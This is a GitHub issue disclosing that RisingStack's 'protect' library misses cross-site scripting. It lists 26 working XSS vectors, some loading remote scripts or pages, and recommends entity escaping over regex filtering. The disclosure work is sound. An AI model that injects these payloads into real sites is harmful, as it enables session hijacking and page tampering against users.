protect icon indicating copy to clipboard operation
protect copied to clipboard
verified publisher icon RisingStack

Vulnerable to XSS attacks

Open cianmce opened this issue 7 years ago • 4 comments

I found multiple XSS Attack vectors that aren't caught by the isXss function: https://github.com/RisingStack/protect/blob/60b0c91e86686d34e5202419ce9ae7e8dc08edcd/lib/rules/xss.js#L4-L13

tl;dr

Don't use regex's for sanitization of HTML but if you are, then at least strip out all tags with something like:

const xssAnyTag = new RegExp('<(|\/|[^\/>][^>]+|\/[^>][^>]+)>')

But with even this, I'd imagine a carefully constructed XSS vector could get around it I'd advise:

  • Escaping the characters using HTML entities e.g.
var entityMap = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
  '/': '&#x2F;',
  '`': '&#x60;',
  '=': '&#x3D;'
};
escapeHtml = function(value) {
  return String(value).replace(/[&<>"'`=\/]/g, function (s) {
    return entityMap[s];
  });
}
  • Using a nodes text attribute(This isn't an option for server side code) e.g.
document.getElementById("my_id").innerText = unsafeString;

As discussed in many posts e.g.

  • https://stackoverflow.com/a/535022
  • https://www.quora.com/What-is-a-good-regular-expression-for-preventing-XSS-attacks-in-JavaScript

Regular expressions are not a valid approach when dealing with a more complicated language(especially when browsers support dirty HTML)

For example, here are 26 valid XSS attack vectors that are all reported as false

Attack Vectors

<script >alert("XSS - 1");</script >
<script type="application/javascript">alert("XSS - 2");</script >
<script src="https://rawgit.com/cianmce/bc4ede289eba9eb34c5ef499ac3298eb/raw/1d80cdd168bdc4389ed011d41ecca4242ca633e8/xss-alert.js?msg=XSS - 3"></script >
<meta http-equiv="refresh" content="0;URL=https://httpbin.org/get?xss=XSS - 4" />
<input type="image" src onerror="alert('XSS - 5')">
<object data="a.a" onerror="alert('XSS - 6')" />
<object data="a.a" onerror="alert('XSS - 7')">
<link data="a.a" onerror="alert('XSS - 8')">
<input onfocus="console.log('XSS - 9')" autofocus> // Uses console.log as "alert" will cause infinate loop
<video ><source onerror="alert('XSS - 10')" >
<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 11')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 12')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;" />
<iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;alert('XSS - 13')&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;"></iframe >
<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 14"></iframe >
<iframe style="display:none;" src="https://rawgit.com/cianmce/774471fbcffd4e31a950fbffa9b9a4d0/raw/7d68ac13ae3cca900ae3cec7cb21cf1f1c36d957/alert.html?msg=XSS - 15">
<iframe style="display:none;" src="//a.a" onload="alert('XSS - 16');"></iframe >
<div style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 17')"></div >
<p style="opacity: 0; width:100%; height:100%; position:absolute; top:0px; left:0px; z-index:9999" onmousemove="alert('XSS - 18')">
<frameset onload="alert('XSS - 19')"><frame onload="Limited support"></frameset >
<a href="javascript:alert('XSS - 20')" style="text-decoration: none; color:#000;" > 
<a onclick="alert('XSS - 21')" style="text-decoration: none; color:#000;" > 
<a onmouseover="alert('XSS - 22')" style="text-decoration: none; color:#000;" > 
<body onunload="alert('XSS - 23')">
<body onresize="alert('XSS - 24');">
<body onload="alert('XSS - 25')">
  <!-- XSS - 26: No JavaScript, but fully hides the page and prevents any clicks -->
<body style="opacity:0; pointer-events: none; filter: alpha(opacity=0);">

Proof Of Concept

These have been tested on the current function, the updated function to test for any tags, being escaped and being set using the text attribute. The results can be seen here: http://embed.plnkr.co/xHbhB29JWWyMUMeHsLrm

I'm sure there are many other edge cases I haven't thought of yet or that haven't been developed by browsers yet.

If you insist on using regex, here's a good list + just remove any tag https://github.com/PHPIDS/PHPIDS/blob/master/lib/IDS/default_filter.json

cianmce avatar Mar 26 '18 23:03 cianmce

CVE-2018-1000160 can be used to track this issue

cianmce avatar Oct 28 '18 14:10 cianmce

@cianmce I am curious. Which CNA assigned this CVE?

vdeturckheim avatar Nov 05 '18 12:11 vdeturckheim

@vdeturckheim Any CVE that is 7 digits the CNA will be DWF. You can also see the assigning CNA on CVE's web site as of earlier this year:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000160

Assigning CNA

Distributed Weakness Filing Project

attritionorg avatar Nov 05 '18 21:11 attritionorg

@attritionorg good catch thanks.

vdeturckheim avatar Nov 05 '18 21:11 vdeturckheim